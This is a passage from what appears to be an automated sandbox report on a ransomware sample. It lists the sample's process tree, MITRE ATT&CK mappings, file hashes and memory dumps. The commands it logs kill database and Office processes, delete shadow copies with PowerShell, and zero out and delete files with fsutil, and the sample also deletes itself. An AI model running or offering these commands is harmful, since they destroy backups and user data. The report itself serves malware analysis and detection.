- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1284
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1572
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3344
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4892
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3816
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1880
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3652
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2776
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:896
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5084
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3592
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3408
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4488
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1524
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1988
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3372
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:7164
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5576
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3372
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:5392
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
  2⤵
  PID:6344
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:6544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log

Filesize
1.3MB

MD5
31751f731a90eaa4ff5b20769b92a7a3

SHA1
ea2de10623cf801e5a1125173809d812684a173d

SHA256
5c37fef08fd50031d45194412f49a45ef8723c95896feb06165bcbc7f75513ca

SHA512
8bef2d17a4709a2d32b27973f3110f21f295685c3993bfdfed857a4df4aa0e7b84e836085f96bd3f565bbe77ec1bd80c4596b9c572c10a32ad91467137e1c7fe

Download Submit
C:\ProgramData\Package Cache\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}v56.64.8804\windowsdesktop-runtime-7.0.16-win-x64.msi

Filesize
28.8MB

MD5
5c56a470834f00229e8448273df29cd9

SHA1
ba20188164386361feeb3a581685b0f65e07273b

SHA256
e9b0ac3c7de891b9d7c61d62aff864538cb742f741999fa7163ce2198cc1baa2

SHA512
c3cdd01a67c8b4d7cbe73220ce949381297af993e2541cef58ca8935a2817d18d25b237f5e23ea36f7dd59e9d3ca11f55ad41e7a889d8b2680504ec160cc4c60

Download Submit
C:\ProgramData\Package Cache\{2BB73336-4F69-4141-9797-E9BD6FE3980A}v64.8.8795\dotnet-host-8.0.2-win-x64.msi.energy[[email protected]]

Filesize
728KB

MD5
963135cebf23bce6ec91274cbbb8cf3c

SHA1
355b192c7e653423b3665a73f79a2e4a0f595a77

SHA256
0fc3ec4e0d5e74f16892edc40a3c54c2c4a1a61e542b49166ee9c6ab6421c98e

SHA512
c2f444c85f0d651d24299f1c6b3118c7958253a69c46a10fa6860fd318e4c7e7cebae2af97eaca6add883e1584ff3d8f190527060bfea6a3ba1fd19d18be39f9

Download Submit
C:\ProgramData\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\dotnet-runtime-6.0.27-win-x64.msi

Filesize
25.7MB

MD5
fc5b52f202cc2bbed0c65a017b7d150d

SHA1
8079caf6740028f92fcb582ef78fdb157c0b9aa4

SHA256
7a6696021e0dad2a240cda388d55ed7c16a00bd08f6dcb2b228e3bdb8177f134

SHA512
41287e23f3b0c64311df771e5cbb3786ff15a06efd6e08647e10fb2d2b90c98c3d29c288c744975874e6fe4ff4d3e7fc243618a665c2ac4934e041e1257164e8

Download Submit
C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[[email protected]]

Filesize
180KB

MD5
7fa50ae5d40044565c264f2d2322a859

SHA1
1b26c692310ebd0546896ccfe2043a49ba485ebf

SHA256
de7020a9b0ed46676d67c0268c631b0257fae53da08ba528d107aa3bdb365146

SHA512
61da9cfd5809c661aadd0e9d1d20a6129043fd562675235ca02c835b4680cd6c978fbf081fc53c5823c4f480f700f99908d6ba2620bdb3ca49a89e66a3b56861

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhek2yr3.xom.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Filesize
828B

MD5
186ca2e26e9c81d12a9ad78010b851df

SHA1
77e7691533cbe79c123d46b3a9f97e5f3a5b93b9

SHA256
57c49a407d363bb7e29f0e2307916e3348a0e4d457836f637234e28ecc55af1b

SHA512
614c495b1f1a60d14f87116aa07f8864320b03ef11fe637118b1ec300e6fe71a584284c6988f6db99975616088ac4ab1c16cb9425db7ca97cfffb0bffc6d91ad

Download Submit
memory/2132-155-0x00007FFD4BE13000-0x00007FFD4BE15000-memory.dmp

Filesize
8KB

Download
memory/2132-255-0x00007FFD4BE10000-0x00007FFD4C8D1000-memory.dmp

Filesize
10.8MB

Download
memory/2132-0-0x00007FFD4BE13000-0x00007FFD4BE15000-memory.dmp

Filesize
8KB

Download
memory/2132-2-0x00007FFD4BE10000-0x00007FFD4C8D1000-memory.dmp

Filesize
10.8MB

Download
memory/2132-1-0x0000000000470000-0x000000000048A000-memory.dmp

Filesize
104KB

Download
memory/2132-502-0x00007FFD4BE10000-0x00007FFD4C8D1000-memory.dmp

Filesize
10.8MB

Download
memory/3372-20-0x000001E467AF0000-0x000001E467B12000-memory.dmp

Filesize
136KB

Download